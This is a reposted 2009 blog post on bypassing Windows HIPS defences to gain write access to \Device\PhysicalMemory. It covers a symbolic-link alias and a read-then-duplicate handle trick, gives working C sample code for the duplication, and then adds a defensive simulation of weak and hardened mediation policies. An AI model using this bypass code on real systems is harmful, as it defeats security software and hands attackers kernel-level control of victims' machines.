[Repost] Bypassing HIPS defences: duplicating the physical memory handle
2009-08-09 15:38
As is well known, Windows 2000/XP/2003 SP0 expose a Section object named \Device\PhysicalMemory through which physical memory can be operated on directly. By mapping this object and manipulating the mapped physical memory, one can operate on ring 0 memory and so reach ring 0 without loading a driver. This technique was worn out many years ago, and most driver-based firewalls, the vast majority of HIPS products, antivirus software and so on defend against it. Still, an old tree can put out new blossoms; let us look at some new ways of making use of this object:

1) CreateSymbolicLink. This too is a very old method, and many security products already defend against it. Some security products only guard NtOpenSection and decide whether to intercept based on whether the object being opened is named \Device\PhysicalMemory; but once a symbolic link to \Device\PhysicalMemory has been created, the object can be opened just the same through NtOpenSection.

2) The duplicate method. Most current security products intercept opens of \Device\PhysicalMemory and check whether DesiredAccess includes SECTION_MAP_WRITE (apart from a few extremely tedious HIPS that nobody uses, which can be ignored entirely), because some legitimate software also needs to open \Device\PhysicalMemory to read physical memory (Microsoft's WGA, for example). This leaves attackers a gap to exploit: an attacker can first open the physical memory object with SECTION_MAP_READ, then duplicate the handle requesting SECTION_MAP_WRITE, thereby obtaining write access to physical memory and writing to it. Most security products do not defend against this (瑞*, for example), and so the attacker once more gains supreme power over the system~

Sample code:

#include <windows.h>
#include <winternl.h>   /* UNICODE_STRING, OBJECT_ATTRIBUTES, InitializeObjectAttributes */
#include <stdio.h>

/* The object name discussed in the text; the original snippet used phyname without declaring it. */
static const WCHAR phyname[] = L"\\Device\\PhysicalMemory";

int main(void)
{
    UNICODE_STRING uniname;
    OBJECT_ATTRIBUTES oba;
    HANDLE handle;
    HANDLE xhandle;
    LONG stat;
    BOOL bret;
    HMODULE hlib = LoadLibraryA("ntdll.dll");
    PVOID p = GetProcAddress(hlib, "ZwOpenSection");

    uniname.Buffer = (PWSTR)phyname;
    uniname.Length = sizeof(phyname) - sizeof(WCHAR);
    uniname.MaximumLength = sizeof(phyname);   /* original had sizeof(uniname), which is smaller than Length */
    InitializeObjectAttributes(&oba, &uniname, 0x40, 0, 0);   /* 0x40 = OBJ_CASE_INSENSITIVE */

    /* ZwOpenSection(&handle, 4, &oba) with 4 = SECTION_MAP_READ, called through the raw
       function pointer in stdcall order (x86 MSVC inline assembly). */
    __asm {
        lea eax, oba
        push eax
        push 4
        lea eax, handle
        push eax
        call p
        mov stat, eax
    }
    printf("stat 1 %08x\n", stat);

    /* Duplicate the read-only handle while asking for SECTION_MAP_WRITE as well:
       this is the step the text says most products do not check. */
    bret = DuplicateHandle(GetCurrentProcess(), handle, GetCurrentProcess(), &xhandle,
                           SECTION_MAP_WRITE | SECTION_MAP_READ, FALSE, DUPLICATE_CLOSE_SOURCE);
    printf("dup %d\n", bret);
    return 0;
}
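The two gaps described above (name matching that ignores symbolic links, and an access check that happens only at open time and never at duplication) can be made concrete in a small mediation model. The following C program is an added example written for this page and is not code from the original post: it simulates an object manager with a constructed symbolic-link table (the alias \??\PhysMem is made up for the demo) and a handle table, then replays both routes against the weak policy the post describes and against a hardened one that canonicalizes the name before comparing it and refuses to let a duplicated handle gain rights the source handle was never granted. Nothing in it touches the real object manager.

```c
/* Model of a HIPS mediation policy for section objects (added example, not the post's code).
 * Everything below is a constructed in-process simulation: names, symbolic links and
 * handles are plain C data; no real kernel object is opened. */
#include <stdio.h>
#include <string.h>

#define SECTION_MAP_WRITE 0x0002u
#define SECTION_MAP_READ  0x0004u
#define MAX_HANDLES 16

static const char *PHYSMEM = "\\Device\\PhysicalMemory";

/* Constructed symbolic-link table: alias -> target (the alias is invented for the demo). */
struct symlink { const char *alias; const char *target; };
static const struct symlink g_links[] = {
    { "\\??\\PhysMem", "\\Device\\PhysicalMemory" },
};

/* Simulated handle table: canonical object name plus granted access; access 0 = free slot. */
struct handle_entry { const char *name; unsigned access; };
static struct handle_entry g_handles[MAX_HANDLES];

static void reset_handles(void) { memset(g_handles, 0, sizeof g_handles); }

/* Follow symbolic links (bounded, so a cyclic table cannot hang us) to the canonical name. */
static const char *canonicalize(const char *name) {
    int hops;
    for (hops = 0; hops < 8; hops++) {
        size_t i; int found = 0;
        for (i = 0; i < sizeof g_links / sizeof g_links[0]; i++)
            if (strcmp(name, g_links[i].alias) == 0) { name = g_links[i].target; found = 1; break; }
        if (!found) break;
    }
    return name;
}

/* Weak open policy from the post: compare only the literal name passed in, deny on write. */
static int weak_open_allowed(const char *name, unsigned access) {
    return !(strcmp(name, PHYSMEM) == 0 && (access & SECTION_MAP_WRITE));
}

/* Hardened open policy: resolve links first, so an alias cannot dodge the name check. */
static int strong_open_allowed(const char *name, unsigned access) {
    return !(strcmp(canonicalize(name), PHYSMEM) == 0 && (access & SECTION_MAP_WRITE));
}

/* Weak duplicate policy: no check at all (the gap the post relies on). */
static int weak_dup_allowed(int h, unsigned new_access) { (void)h; (void)new_access; return 1; }

/* Hardened duplicate policy: a physical-memory handle may not gain rights it was not opened with. */
static int strong_dup_allowed(int h, unsigned new_access) {
    if (h < 0 || h >= MAX_HANDLES || g_handles[h].access == 0) return 0;
    if (strcmp(g_handles[h].name, PHYSMEM) != 0) return 1;
    return (new_access & ~g_handles[h].access) == 0;
}

/* Simulated NtOpenSection: returns a handle index, or -1 when denied or the table is full. */
static int sim_open(const char *name, unsigned access, int (*policy)(const char *, unsigned)) {
    int i;
    if (access == 0 || !policy(name, access)) return -1;
    for (i = 0; i < MAX_HANDLES; i++)
        if (g_handles[i].access == 0) {
            g_handles[i].name = canonicalize(name);   /* the object manager itself resolves links */
            g_handles[i].access = access;
            return i;
        }
    return -1;
}

/* Simulated DuplicateHandle: same object, possibly different access, subject to the policy. */
static int sim_duplicate(int h, unsigned new_access, int (*policy)(int, unsigned)) {
    int i;
    if (h < 0 || h >= MAX_HANDLES || g_handles[h].access == 0) return -1;
    if (new_access == 0 || !policy(h, new_access)) return -1;
    for (i = 0; i < MAX_HANDLES; i++)
        if (g_handles[i].access == 0) {
            g_handles[i].name = g_handles[h].name;
            g_handles[i].access = new_access;
            return i;
        }
    return -1;
}

/* Replays both routes from the post against one policy set.
 * Bit 0: alias route ended with a write handle; bit 1: read-then-duplicate route did. */
static int run_scenarios(int hardened) {
    int result = 0, h;
    int (*open_pol)(const char *, unsigned) = hardened ? strong_open_allowed : weak_open_allowed;
    int (*dup_pol)(int, unsigned) = hardened ? strong_dup_allowed : weak_dup_allowed;

    reset_handles();
    h = sim_open("\\??\\PhysMem", SECTION_MAP_WRITE | SECTION_MAP_READ, open_pol);
    if (h >= 0 && (g_handles[h].access & SECTION_MAP_WRITE)) result |= 1;

    reset_handles();
    h = sim_open(PHYSMEM, SECTION_MAP_READ, open_pol);   /* the legitimate read-only open */
    if (h >= 0) {
        int d = sim_duplicate(h, SECTION_MAP_WRITE | SECTION_MAP_READ, dup_pol);
        if (d >= 0 && (g_handles[d].access & SECTION_MAP_WRITE)) result |= 2;
    }
    return result;
}

int main(void) {
    printf("weak policy, bypass mask:     %d\n", run_scenarios(0));
    printf("hardened policy, bypass mask: %d\n", run_scenarios(1));
    return 0;
}
```

The hardened policy still lets the read-only open that legitimate software needs succeed, and still lets a handle be duplicated with equal or narrower rights; it only refuses the two transitions the post describes, which is the minimum a mediation layer needs to check on both NtOpenSection and NtDuplicateObject rather than on the open call alone.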